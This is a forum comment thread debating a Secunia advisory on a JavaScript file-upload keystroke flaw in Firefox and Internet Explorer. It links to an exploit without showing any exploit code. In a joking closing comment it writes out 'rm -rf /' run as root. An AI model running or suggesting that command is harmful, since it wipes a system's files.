The exploit of this bug can be found here:

http://www.securityfocus...82/436876/30/0/threaded
http://foro.elhacker.net...?topic=126383.msg590990

Greetings!!

lol, it appears that
"those concerned should either disable JavaScript support, or refrain from entering suspicious text on untrusted Web sites."
is the answer for any javascript bug that has yet to be fixed in a browser, though probably most of the people who would fall for most of these expoits would even know how to disable javascript

also, i hope they realise how extremely unlikely this is to ever be exploited, i mean come on, if used on a input box (standard input box) generally you check your input after you have done inputting it (ie cred number or details) so its not likely youll fail to notice it modified, and if its for a file upload who is _not_ going to use the avaliable "Browse..." button? which the javascript would have to then activate to alter once the file had been chosen (in which case the onkeypress even wouldnt be being used, also OnKeyPress would fail xml validation)

the chance of anyone actually using this exploit would be extremely small, i know i would not bother with a site where, when uploading a file, i had to manually input the file path

If there was an update to correct this, I'd make sure to get it within 8-12 years.

"Please insert filename for file with sensitive information (Ex: Credit card numbers)"

EditBox[C:\Documents and Settings\Admin\Local Settings\Application Data\Thunderbird\Profiles\ig7yv4h2.default\...]

Oh yes...big threat...dangerous.

Good thing I use w3m instead. Whew....

Why worry about these threats if you have taken proper percaution to avoid them all together.

Kerio Personal Firewall
Avast Home Edition Virus Protection
Advanced Windows Care V2

All these products are free and stand guard. So all these Security Bullentins are quite useless.

In other words, no user is stupid enough to type in a file name when prompted to do so, even if they have something as common as firewall software running? No wonder the *nix crowd laughs at this stuff!

This is a pretty far stretch. Mozilla and Microsoft will be 'fixing this bug' in due time and are probably mutually thankful that neither company has given the impression that this is anything but a quirk that requires direct user interaction and stupidity to execute.

While I agree in safe guarding technology that could potentially be harmful is important, I also understand that stopping a 'bug' in javascript could potentially break a huge number of websites on the Internet that use similar commands and similar methods.

OK, I understand the point of view, that a security risk is very minimal given that it takes MUCH user interaction, but come on, how long would it take to simply fix the problem?

Secunias job is to REPORT on problem areas. This is a problem, no matter HOW small. It seems to me, that since Secunia went to all the trouble of finding the cause, the LEAST mozilla and IE could do is simply implement a fix. How long would it take? Some say Microsoft takes a long time, which just isn't the case, but Mozilla, if they fixed it, it should only take 5 minutes right?

So why don't they just simply fix it, and the problem goes away. What is the big deal? FIX IT ALREADY!!

They are going to fix it, they're just not going to release a patch specifically for this. The chance of someone getting hit by this exploit is probably one in a billion.

If you're running a Mozilla browser and install the NoScript plugin, then your chance is zero. Hows that for a fix?

Because these guys receive hundreds of security reports a month, Microsoft likely thousands, and they must prioritize their resources where it counts.

Neither camp is ignoring this, but they are making sure that this and other security patches are tested in concurrance and make sure QA doesn't suffer as a result.

For some--a great one. For those who actually need to use legitimate Javascript applets--it sucks. :\

Javascript and Java applets are two completely different things. NoScript can block both depending on the settings you use (along with flash and pings), but it only takes a single click to white list a site and allow it to run like normal. Therefore NoScript is great for everyone. Get your facts straight before flaming something.

you beat me to it. :(

five minutes to fix a bug eh? i take it you're throwing qa right out the window?

I don't think you understand what this involves. They'd either need to implement a keystroke/script analyzer("Anti-Virus style") or create policy settings for what keys sites can and cannot tap, and whether certain keys should be detectable but be passed through anyway.

I'd choose the second one("Opera style"), but another option is to add an upload confirmation box.

In case you have programmed some large projects, you know there are MANY flaws in a system, big and small. And it is logical that there is a priority on fixing the issues. I believe the developers rather fix the more urgent issues instead of spending their time on this rather-difficult-to-exploit flaw.

On Firefox, it is quite easy to fix the problem by the users themselves. Simply install the famous "NoScript" extension and scripts can be enabled only on trusted sites. Simple.

But why Opera is not vulnerable? We'd better ask the Opera developers.

Why is Opera not vunerable? Simply because Opera is the only desktop browser that takes security seriously.

Unfortunatly, the downside of this, is that functionality/compatability is sometimes hampered.

LOL, 5 minutes to fix....

You really have no idea what's involved with producing software do you..

Now if only they took ad and popup blocking as seriously. :P

My AdBlocking and popup blocker works really well, better than the last time I looked at Firefox's extension.

Have you looked at the adblocker in Opera 9? I can block graphical and flash ads without any trouble. (I can't do text ads, but I think the FF adblocker has the same issue).

As for popups, would like to hear what the Firefox blocker does that the Opera one does not... Again, I think the opera 9 popup blocker does everything I need it to.

Now I would like to hear how did you set up your adblocker in Opera? Which ini file do you need to modify? Need to build your own block list?

I admit Opera has a good track record on security. What I don't like about Opera is its functionality. They are implementing something similar in Opera 9 that already exists in Fx, but Opera 9 is still kind of weekly builds.

??? Right click on a page, "Block Content", then block the adverts I don't want. I can then optionally change some of the server names to block all the ad servers from a particular ad farm in Tools, Advanced, Content, Blocked Content.

Seems like your reviewing Opera 6!!!!

Secunia can't be serious, I know they have reaching for it more and more lately; but come on, this is rediculous(sp?).

This just in:
Secunia has deicovered a flaw in Unix/Linux that could cause all of your files to be deleted. THis can be triggered by running the command 'rm -rf /' with root priveleges. Secunia has given this flaw a critical warning because it can render a system useless. Linus Torvalds has responded by telling the people at Secunia to go screw themselves until they can actually find a legitimate flaw, or a girlfriend, whichever comes first.